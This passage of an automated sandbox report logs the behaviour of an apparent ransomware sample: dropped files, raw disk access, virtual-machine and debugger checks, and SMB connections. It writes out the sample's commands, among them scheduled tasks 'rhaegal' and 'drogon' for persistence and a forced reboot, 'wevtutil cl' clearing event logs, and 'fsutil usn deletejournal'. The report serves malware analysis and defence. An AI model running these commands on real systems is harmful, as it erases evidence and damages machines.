          Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: languageoverlayutil.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: directmanipulation.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositorycore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
          Source: C:\Windows\dispci.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
          Source: DECRYPT.lnk.32.drLNK file: ..\..\..\Windows\dispci.exe
          Source: LisectAVT_2403002C_35.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: lsasrv.pdb source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: lsasrv.pdbUGP source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,3_2_04BF9016
          Source: LisectAVT_2403002C_35.exeStatic PE information: real checksum: 0x79289 should be: 0x79294
          Source: C:\Windows\dispci.exeCode function: 32_2_00A879B5 push ecx; ret 32_2_00A879C8

          Persistence and Installation Behavior

          Source: C:\Windows\dispci.exe | Code function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d 32_2_00A839E0
          Source: C:\Windows\SysWOW64\rundll32.exe | Executable created and started: C:\Windows\D99F.tmp
          Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\dispci.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\cscc.dat
          Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\dispci.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\cscc.dat
          Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\dispci.exe

          Boot Survival

          Source: C:\Windows\dispci.exe | Code function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d 32_2_00A839E0
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\System32\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, 3_2_04BF9534
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\LogonUI.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\LogonUI.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess graph_3-4956
          Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_3-4958
          Source: C:\Windows\System32\svchost.exe | System information queried: FirmwareTableInformation
          Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\dispci.exe | Code function: 32_2_00A83FC0 rdtsc 32_2_00A83FC0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,FindCloseChangeNotification,LocalFree,3_2_04BF8B2E
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,3_2_04BF7D4E
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,3_2_04BF8D39
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 300000
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 900000
          Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_3-5772
          Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Windows\cscc.dat
          Source: C:\Windows\dispci.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Windows\D99F.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_19-3494
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7572 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6296 | Thread sleep time: -900000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7568 | Thread sleep time: -200000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7640 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4100 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,3_2_04BF5E9F
          Source: C:\Windows\dispci.exe | Code function: 32_2_00A81B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose,32_2_00A81B80
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_04BF5A73
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 300000
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 900000
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,1
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
          Source: rundll32.exe, 00000003.00000002.1325768430.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2727251396.0000017215858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2726294401.0000017210029000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES1371
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM
          Source: rundll32.exe, 00000003.00000002.1325768430.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW,
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: svchost.exe, 0000000B.00000003.1424176179.000001A5C2010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
          Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node graph_3-4878
          Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node graph_3-4966
          Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node graph_3-4860
          Source: C:\Windows\D99F.tmp | API call chain: ExitProcess graph end node graph_19-3495
          Source: C:\Windows\System32\cdd.dll | System information queried: ModuleInformation
          Source: C:\Windows\D99F.tmp | Process information queried: ProcessInformation
          Source: C:\Windows\dispci.exe | Code function: 32_2_00A83FC0 rdtsc 32_2_00A83FC0
          Source: C:\Windows\D99F.tmp | Code function: 19_2_00007FF6097571F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6097571F0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,3_2_04BF9016
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Code function: 0_2_005110C0 GetModuleHandleW,GetModuleFileNameW,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,0_2_005110C0
          Source: C:\Windows\D99F.tmp | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Code function: 0_2_00511499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,0_2_00511499
          Source: C:\Windows\D99F.tmp | Code function: 19_2_00007FF6097571F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6097571F0
          Source: C:\Windows\D99F.tmp | Code function: 19_2_00007FF6097557FC SetUnhandledExceptionFilter,19_2_00007FF6097557FC
          Source: C:\Windows\D99F.tmp | Code function: 19_2_00007FF609755540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF609755540
          Source: C:\Windows\dispci.exe | Code function: 32_2_00A85C9F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00A85C9F
          Source: C:\Windows\dispci.exe | Code function: 32_2_00A8A966 SetUnhandledExceptionFilter,32_2_00A8A966
          Source: C:\Windows\dispci.exe | Code function: 32_2_00A87757 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00A87757

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.1 445
          Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 104.98.116.138 445
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 1283680486
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
